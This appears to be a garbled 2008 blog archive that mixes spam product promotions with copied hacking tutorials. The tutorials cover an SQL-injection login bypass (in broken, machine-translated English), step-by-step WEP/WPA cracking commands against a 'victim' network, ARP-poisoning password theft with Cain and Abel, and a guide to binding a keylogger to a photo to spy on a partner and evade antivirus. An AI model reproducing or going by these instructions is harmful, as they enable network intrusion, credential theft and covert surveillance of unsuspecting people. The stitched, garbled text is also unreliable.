Study Online to become a Nursing Assistant!

Posted at Friday, August 29, 2008

If you are looking for a career in health care especially become a nursing assistant, you will find information at to help guide you in your career choice. For those of you who are not familiar with nursing assistants, they are known by many names such nurses aid, orderlies, patient care technicians, and home health aides, depending on where you live and work. Certified nursing assistants work under the supervision of a nurse and provide assistance to patients with daily living tasks. Working closely with patients, certified nursing assistants are responsible for basic care services such as bathing, grooming and feeding patients, assisting nurses with medical equipment, and checking patient vital signs. Certified nursing assistants give patients important social and emotional support and also provide vital information on patient conditions to nurses.

If you are interested in learning more about becoming a certified nursing assistant, please be sure to check out St. Augustine Educational Services Online through site that utilize the latest technology to offer a convenient, affordable and accredited nursing assistant program online. St. Augustine Nursing Assistant School provide certificate program on nursing assistance and medical assistance as well. Some benefits of nursing assistant program at St. Augustine Nursing Assistant School such online e-learning program allows students to study at their own pace and finish the program at their convenience. All classes are available 24 hours a day for students. Faculty and staff are always available online should you have any questions. Online Clinical Labs - Virtual Phlebotomy Lab, Virtual Injection Lab, online clinical instructional videos in medication injections, ultrasound and more!

Buy Online Kids Halloween Costume

Posted at Wednesday, August 27, 2008

Did you know that there are many group kids Halloween costumes ideas? Many times, friends, relatives, and individuals that work together elect to dress in attire that is similar in theme on Halloween. In all actuality, that is the most important aspect to creating costumes that are appropriate for an entire group...having a similar theme. If your kids theme matches, then your kids group will be successful in their Halloween attire. Having group costumes can be a lot of fun. The most challenging aspect of the whole endeavor in Halloween costume ideas is choosing costumes that are similar in nature. It is often difficult to think of an idea that everyone will enjoy. However, once you have all agreed on an idea, this is a really fun activity that everyone will thoroughly enjoy.

If your kids grew up in the nineties, there are a number of group Halloween costume ideas that your kids may enjoy. First, your kids have the ever-popular Care Bears. There are many different bears to choose from. Surely each individual in your kids group can find one that truly matches their personality! This can be a lot of fun! Your kids may enjoy dressing like the Power Rangers, popular Disney movies from the decade, and more! If your kids are a Millennium type group, your kids may like dressing up like characters from Spongebob Squarepants, and even Hannah Montana. There are other popular group Halloween costume ideas as well. You may elect to have a Harry Potter theme. This is actually really popular. It is really easy to think about group ideas when it comes to costumes for Halloween. All it takes is a little bit of creativity and finding out what everyone else in the group likes, and you are sure to discover a group theme that everyone will agree on. If you are searching out group Halloween costume ideas, take these into consideration. Not only will your group be a big hit, but you are sure to have a lot of fun with them.

Rightnow, if you need Halloween costume for your kids group there is supplying you with all the information and resources you need to know about Halloween night. Struggling for kids Halloween costume ideas? Look no further. Take a look through Costume Cauldron vast collection of funny kids Halloween costumes as well as kids male and kids female Halloween costumes. The child halloween costume section is the biggest in Costume Cauldron online store and there is much to look through. Costume Cauldron have cute kids costumes for girls and boys that will make them the hit of the party. You’re never too young to celebrate your first Halloween. Pick out one of these adorable baby Halloween costumes to show your new baby’s the sights and sounds of his or her first Halloween. Just be sure to get your little goblin back in time for bed. There is also furry mascot costumes for your school sport games or a full size animals for the party. Don't miss out on Costume Cauldron blonde wig costumes for adult people. So, lets your kids get started their Halloween party!

SQL Injection the Complete Tutorial

Posted at Wednesday, August 13, 2008

SQL Injection the Complete Tutorial

SQL injection is a technique that explores a vulnerability of security that occur in the database of a layer of application. The vulnerability i present when user input i either incorrectly filtered will go string literal escape characters embedded in SQL statements or user input i not strongly typed and thereby unexpectedly executed. The vulnerability is present when user is or incorrectly screened for literal cord escape built-in characters in the instructions SQL or users strongly are not typed and, like this, unexpectedly performed. It i in fact an instance of it lives general class of vulnerabilities that can occur whenever one programming or scripting language i embedded inside another. It is in fact an example of a form more general class of vulnerabilities that can occur whenever a programming language or scripting is inserted inside another.

Or Be an a lot Way NooB of invade a big quantity of sites. ...........

For that vc is going to be necessary. .....

*Google *internet Connected *Strings *codicos of Sql injection *JAP (is not necessario is good use barely as

Then vamu her. ...............como I am baunzinho I see passes them half from the trabaio. ...

' to admin shell root First
vc goes in the google and digitizes the following one (allinurl: "Some Of The Strings") Without "Parenteses"

ah vc chooses a site noob applies in the login by example:' or' = 1 sign to same thing:' or' = 1

Promptly now vcs can vary the codicos and itself will want polpar work use some scanner of vulnerability as by example the acunetrix __________________________________________________

JAP 00.08.073

JAP — Anonymity & Privacy is a program that is going to guarantee to his privacy while sails for the internet. With that, you avoid that can monitor your accesses and guarantees the your anonymity by the net.



Acunetix Web Vulnerability Scanner 5,0

Omprove itself his site is to the Test of hackers Acunetix Web Vulnerability Scanner is a powerful utility one that analyzes a site in search of possible vulnerabilities.

Athletic Shoes for Men, Women, and Kids

Posted at Wednesday, August 13, 2008

If you are looking for athletic shoes from many popular brand name, there is recommend name for you At auction yesterdays and today's hottest footwear, offering savvy internet shoppers an opportunity to stretch their dollar further than ever. auctions brand name stock from floor models to disheveled items that are slightly dusty from warehouse storage. lists all brands, colors and sizes currently available. All shoes are standard manufacturer's sizes, widths and lengths unless otherwise noted in the auction. sells a variety of popular brand name athletic shoes for men, women, and kids.'s website create a simple way for customers to select and purchase from various footwear brands. They offers customers the ability to easily view ever-expanding footwear offering. where you always find the best athletic shoes at the lowest prices anywhere. carries your favorite brands in athletic footwear at the best prices. They provides most of popular brands such as Adidas, Converse, Fila, Hurley, K-Swiss, New Balance, Nike, PF Flyers, Pony, Puma, Vans, and more. At website you can selected the category (brand, style, size, color), then select your desired brand, click view selected brand you will see many available shoes. You may looking for some great prices on basketball, tennis, or any other type of athletic shoes, you might want to check out Adidas Shoes. This popular brand shoe which has a huge range of styles. With a few simple clicks, consumers can find shoes by brand including adidas, by style such as basketball shoes, and by specific sizes, widths and colors. offers discount shoes from many popular brand name athletic shoes. If you like to collect many cheap shoes you might to hunt for it from will serve you better than other shoe store. Start browsing for your shoes and find them at

Advertisers Get Buzz with Snapbomb

Posted at Wednesday, August 13, 2008

The trend of blog advertising has significantly grown over the last year as a new medium for companies to increase their media presence. However, the idea of bloggers being paid by companies to promote their product is relatively new. Part of the allure of blogs are their direct community input and feedback. Advertisers have just started to figure out how to inject their buzz without alienating the very target market they want to attract to their products. We think that buzz marketing or blog marketing done fairly is a valuable service to both consumer online and their customers. Buzz marketing, is highly valued by advertisers. Blog advertising can engage an important niche, enabling you to reach a critical market segment or to broaden the impact of your marketing spend. Regardless of your product, blogs can be an integral part of a marketing strategy.

Snapbomb offers advertisers generate buzz with blog marketing. Snapbomb is the fastest way to spread the word through the blogging community. They connects advertisers with bloggers willing to write honest reviews about their services and products. Benefits for advertisers include generate buzz, publicity and word-of-mouth marketing among thousands of blogs, announce your products, services, websites, and ideas to the world. The more bloggers talk about your site the better. Many blogs syndicate stories they see on other sites. Getting Reviewed by bloggers will provide advertisers with valuable feedback that advertisers can use to better understand advertisers's audience and customers.

WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

Posted at Saturday, August 09, 2008

WEP cracking in a nutshell (NEWCOMERS PLEASE READ)

It found that some of the commands differ from backtrack 2 to backtrack3 (slightly)
either way heres a step by step
once you have the backtrack iso cd in the tray and your network adapter plugged into the usb (it use a network adapter)
boot up your computer.
next to the k that resembles start menu in windows there should be a little black window click on it and it pulls up whats called terminal (simmilar to dos for windows)
now itll go into what to type in the terminals, it usually have about 4 of these windows open and it will identify which window you type in by writing "t1,t2, t3, etc" before each instruction
where it type <> you insert information where it type [enter] you hit enter
youll get it as we go along

also when you see your victims bssid you will want to copy it and then paste it where needed being that a bssid is pretty long. for those who hate using the mouse and use hotkeys the paste function is shift+insert for linux

type: airmon-ng stop ath0 (this will let you see the devices your using ex: rausb0) [enter]
ifconfig [enter] <-- it dont remember if this enter goes here you can try it with or without, see which works
macchanger --mac 00:11:22:33:44:55 (this changes your mac address in order to cause some confusion) [enter]
airmon-ng start [enter]

t2: airodump-ng (scans the network for available wireless networks, press ctrl+c to pause) [enter]
airodump-ng -c -w --bssid [enter]
(let this window run throughout the entire crack)
basically what you just did in t2 was scan the available networks and then say to your computer ok well were gonna make a catch file in this location (this is where i said name a catch file) and were gonna read packets of information in this location (what your doing to crack the wep encryption is send information (packets) to whatever network you want to crack and that network is sending information back, the files we want are not neccessarily the packets but the arp's, thats what aircrack actually analyzes in order to crack the wep)

aireplay-ng -1 0 -a -h 00:11:22:33:44:55 [enter]
aireplay-ng -3 -b -h 00:11:22:33:44:55 [enter]

aircrack-ng -n 64 --bssid -01.cap

for the catch file part...lets say it named my catch file "hack" it would type in hack-01.cap

and thats it you should have your wep passphrase

also a little something it noticed, though not true for all networks its true for many networks around my way....
it noticed the bssid is often the same as the passphrase, so just MAYBE you would want to try the bssid before doing the rest of the hack

WEP Crack Basics:
bt ~ # iwconfig (check wireless card name - we will assume ath0)
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w capture -c 1 ath0 (writes to file "capture" on channel 1, as specified)
New terminal (leave other one open)
bt ~ # macchanger ath0 (not down MAC address)
bt ~ # aireplay-ng -1 0 -e NETWORK -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0 (where the AA:BB:etc. is the access point's MAC address, also seen as the BSSID in the first terminal [airodump] window, and the second GG:HH:etc. is your own MAC address as seen in the macchanger window)

Section for when clients are attached to the network:
bt ~ # aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0

Section for when no clients attached:
Method 1-
bt ~ # aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k -l -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0

Method 2-
bt ~ # aireplay-ng -4 -h GG:HH:II:JJ:KK:LL -b AA:BB:CC:DD:EE:FF ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k -l -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0

Cracking the key:
bt ~ # aircrack-ng (-z) capture*.cap (the -z is in brackets because it can be used if you have captured ARP requests, and is faster - so try this first, but if it doens't work - remove it) (the capture*.cap is just using the file that you captured to - this can be run whilst capturing)

WPA Cracking:
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w wpa -c 1 ath0
New Terminal:
bt ~ # aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c MM:NN:OO:PP:QQ:RR ath0 (where the MM:NN:etc. is a client's MAC address - this forces them to disconnect, giving us the "handshake" that we want, which contains the password, otherwise you just have to wait for a client to connect)
bt ~ # aircrack-ng -w dictionary.lst wpa*.cap (dictionary.lst is a dictionary/wordfile, as WPA has to be cracked with one of these. wpa*.cap is the capture file)

Sniffing for passwords

Posted at Saturday, August 09, 2008

Sniffing for passwords

Download and install Cain and Abel ( If you have nmap or wireshark installed you probably won’t have to install winpcap(which comes with the installation.)

Run the program.
Make sure the sniffer tab is selected at the top and the hosts tab is selected at the bottom. Make sure the sniffer is on it is the green circuit board button in the top left corner. Alternate click in the white space and click on scan mac addresses. This does an arp scan(different from an IP scan). It will show everyone on your network except for you.

Now switch to the arp poisoning tab. APR bottom tab next to hosts. Click the + icon on the top of the menu. This will give you a choice of Ip addresses to poison. The most interesting traffic is going to be between the default gateway(which you can find by typing ipconfig in the command prompt) and the other users on the network. Select the default gateway on the left and all the other users on the right. **Optional fun Now if computers are sharing files, to snag their passwords you need to select all the ip’s to all the ip’s you have to do this one ip at the time on the left. **
If it is a large network you are going to want to monitor your resources on your computer to make sure you aren’t hitting 100% processor consumption or maxing out your ram. If this happens it will DDOS the network and people will start losing connections which is no good for password sniffing.
So now is the hard part….wait. Wait for people to log on to forums and myspace and all those great sites and wait for them to get in their vpns and telnets and such. One thing you can do while you wait is periodically check your internet connection to make sure you haven’t DDOSed the network. Ok so now time for the boon, click on the password tab at the bottom and see how many passwords you have racked up. If they are encrypted alt click on them and send them to the cracker built in to cain and abel.

On networks with a hub you don’t have to arp poison, but most modern networks are switched. So what is actually happening when you do this, is your computer answers every arp query as though it is the computer the packet is destined for. So your computer has all data from the network sent to it. I then routes(it doesn’t really route because that would be a layer three thing it would be more correct to say, it sends) the packets to the correct computer. So Cain has a bunch of prebuilt lists of stuff to look for, sometimes cain doesn’t catch all the passwords because of trixy web developers so if you have time you could run wireshark at the same time and manually comb through that data yourself. Etherflood is another program that will arp poison on a windows network.

a little bit about keyloggers

Posted at Saturday, August 09, 2008

a little bit about keyloggers

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your victim. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers

Stylish Prescription Glasses

Posted at Monday, August 04, 2008

Are you looking for affordable eyeglasses? Now there is incredible stylish new frames from Zenni through website This online shopping offers huge selection of frames, with single vision lens, sunsensor (potochromic)lens, tinted sunglasses lens, bifocal lens and progressive lens. Choose from a variety of high quality complete eyeglass such as Zenni Optical $ 8 Rx Eyeglasses. provides qualified stylish prescription glasses and durability guarantee. Zenni Optical was on FOX news! Consumer reporter Melissa Painter looks into whether its products are a Deal or a Dud. What are you waiting for? visit and get your stylish eyeglass now.

Gift Buying Guides

Posted at Monday, August 04, 2008

Rightnow if you want to presents the gift for your family or your relations, there is easy way to buy through the web at This online shopping offers gift buying guides for people so they can choose the right gift suitable their wish. The gift buying guides split up into two groups by recipient and by occasion where you can click each link which you want. For by recipient there are some the links such as Gifts for Women, Gifts for Men, Gifts for Dads, Gifts for Grandparents, Gifts for Wives and etc. Whereas for by occasion there are some the links such as Anniversary Gifts, Wedding Gifts, Party Gifts, and many more.

Each of the links be found a few sentence where illustrate about the means of the link. For example, the link Gifts for Women, here illustrate how women can be complicated at times, and buying one a gift can be extremely intimidating. Before you get discouraged, know that there are myriad ways to choose the perfect gift for your mother, daughter, sister, girlfriend, wife or friend, and remember that it's her interests that count most. Listen to her dislikes and likes, and take note of her personal style. So, if you are looking for the gift, don't confuse just visit, all your need available here.